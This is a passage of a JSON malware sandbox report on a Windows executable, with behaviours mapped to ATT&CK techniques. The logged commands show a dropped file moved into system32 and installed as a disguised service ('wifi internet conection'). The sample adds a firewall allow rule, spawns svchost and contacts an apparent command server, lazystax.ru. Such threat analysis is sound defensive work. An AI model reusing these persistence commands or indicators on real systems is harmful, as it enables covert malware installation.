"name": "PE file entrypoint instructions", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"nhhyjsjl.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"cmd.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"sc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"netsh.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000\n \"cmd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000\n \"sc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000\n \"nhhyjsjl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76EA0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004280)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\nhhyjsjl.exe\" %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004672)\n Spawned process \"sc.exe\" with commandline \"create zvdnuoqu binPath= \"%WINDIR%\\\\system32\\\\zvdnuoqu\\\\nhhyjsjl ...\" (UID: 00000000-00001376), Spawned process \"sc.exe\" with commandline \"description zvdnuoqu \"wifi internet conection\"\" (UID: 00000000-00004608), Spawned process \"sc.exe\" with commandline \"start zvdnuoqu\" (UID: 00000000-00004836), Spawned process \"nhhyjsjl.exe\" with commandline \"/d\"C:\\\\71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e ...\" (UID: 00000000-00002928)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002444), Spawned process \"svchost.exe\" (UID: 00000000-00002980)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004280)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\nhhyjsjl.exe\" %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004672)\n Spawned process \"sc.exe\" with commandline \"create zvdnuoqu binPath= \"%WINDIR%\\\\system32\\\\zvdnuoqu\\\\nhhyjsjl ...\" (UID: 00000000-00001376), Spawned process \"sc.exe\" with commandline \"description zvdnuoqu \"wifi internet conection\"\" (UID: 00000000-00004608), Spawned process \"sc.exe\" with commandline \"start zvdnuoqu\" (UID: 00000000-00004836), Spawned process \"nhhyjsjl.exe\" with commandline \"/d\"C:\\\\71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e ...\" (UID: 00000000-00002928)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00002444), Spawned process \"svchost.exe\" (UID: 00000000-00002980)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e176a@ADVAPI32.dll\"\n \"0e000f00703f176a@ADVAPI32.dll\"\n \"0e000f00cc3f176a@ADVAPI32.dll\"\n \"11001200b447176a@ADVAPI32.dll\"\n \"110012004848176a@ADVAPI32.dll\"\n \"120013008c48176a@ADVAPI32.dll\"\n \"12001300e448176a@ADVAPI32.dll\"\n \"14001500dc6f176a@ADVAPI32.dll\"\n \"14001500f46f176a@ADVAPI32.dll\"\n \"140015000c70176a@ADVAPI32.dll\"\n \"170018002470176a@ADVAPI32.dll\"\n \"0d000e003c70176a@ADVAPI32.dll\"\n \"110012004c70176a@ADVAPI32.dll\"\n \"110012006070176a@ADVAPI32.dll\"\n \"0f001000a071176a@ADVAPI32.dll\"\n \"14001500e071176a@ADVAPI32.dll\"\n \"14001500f871176a@ADVAPI32.dll\"\n \"0c000d004072176a@ADVAPI32.dll\"\n \"0c000d005072176a@ADVAPI32.dll\"\n \"0e000f006072176a@ADVAPI32.dll\"\n \"0e000f007072176a@ADVAPI32.dll\"\n \"0b000c008072176a@ADVAPI32.dll\"\n \"18001900b874176a@RPCRT4.dll\"\n \"13001400e474176a@RPCRT4.dll\"\n \"14001500f874176a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004512)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00004280) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00004280) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"nhhyjsjl.exe\" (UID: 00000000-00002928) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"nhhyjsjl.exe\" (UID: 00000000-00002928) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00002444) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", USERDNSDOMAIN=\"%OSUSER%-PC\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00002444) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"svchost.exe\" (UID: 00000000-00002980) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00002980) was launched with missing environment variables: \"LOGONSERVER, HOMEPATH, HOMEDRIVE\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C mkdir %WINDIR%\\system32\\zvdnuoqu\\\" - (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /C move /Y \"%TEMP%\\nhhyjsjl.exe\" %WINDIR%\\system32\\zvdnuoqu\\\" - (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" create zvdnuoqu binPath= \"%WINDIR%\\system32\\zvdnuoqu\\nhhyjsjl.exe /d\\\"C:\\71caf290168c22d29d9d2c3e27\" - (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" description zvdnuoqu \"wifi internet conection\"\" - (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\sc.exe\" start zvdnuoqu\" - (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\netsh.exe\" advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow prog\" - (UID: 00000000-00004512)\n \"nhhyjsjl.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00002928)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"nhhyjsjl.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"nhhyjsjl.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"nhhyjsjl.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\nhhyjsjl.exe\" %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004672)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"\n \"<IPv4>:25\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" has an executable section named \".text\"\n \"nhhyjsjl.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" has an writable section named \".data\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" has an writable section named \".text\"\n \"nhhyjsjl.exe\" has an writable section named \".data\"\n \"nhhyjsjl.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xa5d000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xdb6000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"nhhyjsjl.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" was detected as \"VC8 -> Microsoft Corporation\"\n \"nhhyjsjl.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"nhhyjsjl.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\nhhyjsjl.exe]- [targetUID: 00000000-00004512]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"nhhyjsjl.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" reads file \"c:\\71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\DELEGATEFOLDERS\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\"; Key: \"\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SESSIONINFO\\1\\DESKTOP\\NAMESPACE\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors 